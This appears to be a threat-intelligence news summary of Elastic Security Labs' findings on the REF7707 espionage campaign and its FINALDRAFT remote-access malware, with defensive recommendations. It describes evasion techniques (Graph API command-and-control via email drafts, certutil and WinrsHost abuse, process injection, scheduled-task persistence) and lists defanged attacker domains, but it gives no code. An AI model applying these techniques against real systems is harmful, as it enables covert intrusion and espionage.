In a recent investigation, Elastic Security Labs uncovered a global cyberespionage campaign attributed to the threat actor group REF7707.
This operation leverages a novel malware family, FINALDRAFT, targeting both Windows and Linux systems.
The campaign has been linked to attacks on a South American foreign ministry and entities in Southeast Asia, showcasing the group’s technical capabilities and operational missteps.
Advanced Malware with Cross-Platform Reach
FINALDRAFT is a highly engineered remote administration tool (RAT) written in C++ and designed for espionage.
It includes advanced features such as process injection, file manipulation, and network proxying.
Its standout capability is leveraging Microsoft’s Graph API for command-and-control (C2) communications via Outlook email drafts.
This method allows the malware to blend malicious activities into legitimate traffic, evading traditional detection mechanisms.
The malware operates alongside loaders like PATHLOADER and GUIDLOADER, which execute encrypted shellcode in memory.
These loaders facilitate the deployment of FINALDRAFT by downloading payloads from attacker-controlled infrastructure.
Notably, FINALDRAFT has variants for both Windows and Linux, with the Linux version supporting multiple C2 protocols, including HTTP/HTTPS and reverse UDP.
Exploitation Techniques
REF7707 employs several sophisticated techniques to evade detection and maintain persistence:
- Abuse of Legitimate Tools: The attackers utilize Microsoft’s certutil application and Windows Remote Management’s Remote Shell plugin (WinrsHost.exe) to download and execute payloads.
- Process Injection: FINALDRAFT injects shellcode into legitimate processes like
mspaint.exe, ensuring stealthy operation. - Persistence Mechanisms: The malware uses Scheduled Tasks in Windows to run malicious binaries at regular intervals with SYSTEM privileges.
- Obfuscation: String encryption and API hashing are employed to hinder static analysis.
WinrsHost.exe is used to execute commands
The Linux variant mirrors many of these capabilities, including executing shell commands via popen and self-deletion mechanisms to erase traces post-intrusion.
Despite its sophistication, REF7707’s campaign management exhibited flaws.
Poor operational security exposed pre-production malware samples and additional infrastructure.
For instance, attackers inadvertently revealed domains such as support.vmphere[.]com and update.hobiter[.]com, which were linked to their command-and-control servers.
The discovery of FINALDRAFT highlights the growing trend of cybercriminals exploiting legitimate cloud services like Microsoft Graph API for covert operations.
This technique complicates detection efforts as malicious traffic is indistinguishable from legitimate business activities.
Organizations are urged to adopt robust security measures, including:
- Monitoring anomalous activity in email drafts and OAuth token usage.
- Deploying endpoint detection tools capable of identifying process injection.
- Enforcing strict access controls for cloud services.
Elastic Security Labs emphasizes that defending against such advanced threats requires a multi-layered approach combining network visibility, endpoint protection, and threat intelligence.
